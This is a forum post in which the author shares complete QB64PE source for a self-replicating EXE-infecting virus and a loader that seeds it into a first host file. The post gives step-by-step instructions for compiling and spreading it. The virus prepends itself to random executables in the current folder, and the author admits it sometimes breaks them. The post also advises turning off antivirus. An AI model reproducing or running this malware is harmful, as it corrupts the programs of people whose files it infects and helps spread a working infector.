Own Virus wroted in QB64PE
#1
First a warning. Take it seriously. If you accidentally copy an infected file to an unsecured computer with no antivirus, it can and almost certainly will corrupt some of the EXE files in the folder where you put the virus (when you run it). The virus is not able to move over the network or between folders. It's just a piece of software when I tried how it might work.

The virus is written in such a way that it replicates to randomly selected EXE files, but always only to one at a time. This infected file then also replicates the virus after its launch. Sometimes it happens, I did not deal with it in depth, that an EXE file simply does not work after being attacked. It doesn't even make virus copy. I've tested this on EXE copies of many of my old programs from QB64 1.1 onwards.

After the program is started, it informs which file it attacks next, plays the song (PLAY) and then starts the original content in the EXE file. It is the first version (I therefore apologize in advance for the mental damage to experienced programmers) and it will probably also be the last version.

First, compile your own virus - just create an EXE, read the code, but don't run it. In order for the virus to start its peaceful malicious activity, it needs to load into a clean EXE file. A second program (loader) is used for this, but in it, before compiling and running it, modify the path to FILE$ - change the WAV.EXE data to another, depending on which EXE file on your disk you determine to be the victim of the virus.

I recommend trying it in a separate folder, with the antivirus turned off, copy for the virus some EXE files into this folder. Most of them should remain functional after being infect unless they need the other files for their normal operation.



VIRUS BODY (in first use just COMPILE BUT NOT RUN!) by me is this named as Virus24.bas, therefore next source code have FileB$ set as Virus24.exe

Code: (Select All)
' Something from my black programming....I just wanted to try it out
' This program is Virus body. Real, functional (mostly), just for testing function something as this....
' It is my first and i think also last version....

' After program start, read from the end the exe file own array, so know if is quest or host.
' If is quest, print message, play music using PLAY, wait three seconds, randomly selects and attacks another EXE file in the directory.
' Virus attack just ONE random EXE file in ONE RUN, limited to current directory,


' First study this code, then compile it BUT NOT RUN IT.

Type V
    id As String * 5 '5 bytes
    offset As Long '  4 bytes
    size As Long '    4 bytes
End Type '         ------------
'                    13 bytes
Dim V As V


'------------------- This here is AFTER inection ---------------------------
myexe$ = MyName$
Print myexe$ 'get run file name

Dim TestFirst As String * 13
'read array to find, if this program is infected or not
ff = FreeFile
Open myexe$ For Binary As ff
Get ff, LOF(ff) - 15, TestFirst$

If InStr(1, TestFirst$, "Virus") > 0 Then
    Get ff, LOF(ff) - 12, V '
    nextexe$ = Space$(V.size)
    Print "31"
    Get ff, V.offset, nextexe$
End If

If V.id = "Virus" Then Infected = 1 Else Infected = 0
p& = Seek(ff)
If Infected Then
    Close ff
    GoSub InfectNext
    ff = FreeFile

End If


If V.offset = 0& Then Print "jsem v "; MyName$; " a v.offset je 0& ": End 'first use

Print "This file status:"; Infected 'message for user, that this file is infected and music
Print "Virus based on the space language QB64"
Play "t140o2p4g2e4.f8g4o3c2o2b8o3c8d4c4o2b4a8g2."
Sleep 3

ff2 = FreeFile
F$ = "ExportedExeFile.exe"
If _FileExists(F$) Then Kill F$
Open F$ For Binary As ff2
Put ff2, , nextexe$
Close ff2
Shell F$

_Delay 2
Close
Rem Kill F$
System

'---------------------------------------------------- Copy virus to other EXE ----------------------------
InfectNext:
trynext:


myexe$ = MyName$

GetExeList$ = myexe$ + " *.exe"
_ScreenHide
If _CommandCount = 0 Then Shell GetExeList$
_Delay .5
_ScreenShow
Cls

Randomize Timer

back:
FileID = Int(1 + (_CommandCount * Rnd)) 'Randomly find 1 EXE file to attack
If FileID > _CommandCount Then
    att = att + 1
    If att > 3 Then GoTo f
    GoTo back
End If
If att = 3 Then Close: Print "There were 3 attempts to generate an exe for the attack.": System

f:
If _FileExists(Command$(FileID)) = 0 Then Print "file "; Command$(FileID); " not exist": System

'copy virus body for transport to other file
ff = FreeFile
Open myexe$ For Binary As ff
OwnVirus$ = Space$(V.offset)
Get ff, , OwnVirus$
Close ff

fileB$ = Command$(FileID) 'name "original" file
Print "Attacking: "; Command$(FileID)
'get data atacked file
ff = FreeFile
Open fileB$ For Binary As ff
If _FileExists(fileB$) = 0 Then System
'+------------------------
Get ff, LOF(ff) - 12, V
If V.id = "Virus" Then Print "This file is already infected!": End ' why do infect more than 1x?
'------------------------
V.id = "Virus"
Close ff

ff = FreeFile
Open fileB$ For Binary As ff
SizeB& = LOF(ff)
Sizeb$ = Space$(SizeB&)
Get ff, , Sizeb$
Close ff


Kill fileB$
Open fileB$ For Binary As ff
Put ff, , OwnVirus$

V.size = SizeB&
V.offset = Len(OwnVirus$) + 1
Put ff, , Sizeb$

Put ff, , V
Close
Return

Function MyName$
    $If WIN Then
        Declare Library
            Function getCommandLine%& Alias GetCommandLineA ()
        End Declare

        Dim m As _MEM, P As String
        Count = 10
        Do Until need > 0 And need2 > 0 'search until string contains not 2x "
            P$ = Space$(Count)
            a%& = getCommandLine
            m = _Mem(a%&, Count)
            _MemGet m, m.OFFSET, P$
            need = InStr(1, P$, Chr$(34))
            need2 = InStr(need + 1, P$, Chr$(34))
            Count = Count + 5
        Loop
        r$ = Mid$(P$, need + 1, need2 - need - 1)
        MyName$ = r$
    $End If
End Function


VIRUS LOADER (use it for initialize in first use, set correctly File$ (is for clear EXE) and FileB$ (is for virus source code compiled to EXE)

Code: (Select All)
'To make the virus work, you need to install it in a clean EXE file. You will do this with this program.
'Important! The virus part itself must be compiled into an EXE (file virus.exe must exists and not run)
'before running this program, and above all, set up your first host EXE file, which will then pass the
'infection on after running. In this case it is file$, here rewrite the WAV.EXE data to any EXE that
'will be the first virus carrier.

Type V
    id As String * 5 '5 bytes
    offset As Long '  4 bytes
    size As Long '    4 bytes
End Type '         ------------
'                    13 bytes
Dim V As V

'V.id = "Virus"
file$ = "wav.exe" 'File name - first virus - container   SET THIS (your exe file for infect)
fileb$ = "virus24.exe" 'exe file contains own virus      SET THIS (virus EXE)


ff = FreeFile
Open file$ For Binary As ff
'+------------------------
Get ff, LOF(ff) - 12, V
If V.id = "Virus" Then Print "This file is already infected!": End 'If is file infected, do not infect it again.
'------------------------
V.id = "Virus"
Close ff

Open fileb$ For Binary As ff
SizeB& = LOF(ff)
Virus$ = Space$(SizeB&)
Get ff, , Virus$
Close ff

Open file$ For Binary As ff
V.size = LOF(ff)
V.offset = Len(Virus$) + 1
original$ = Space$(LOF(ff))
Get ff, , original$
Close ff

Kill file$

ff = FreeFile
Open file$ For Binary As ff
Put ff, , Virus$
Put ff, , original$
Put ff, , V
Close ff


After you compile the first program (the body of the virus), change the paths to file$ and fileb$ in the loader, and run the loader, your first EXE file - the one pointed to by file$ - will be infected. After running this file, it should show a notification about what next file will be attacked, play music, and then start the original program. Everything is done extremely amateurishly, it was just a matter of testing the principle.


Reply




Users browsing this thread: 1 Guest(s)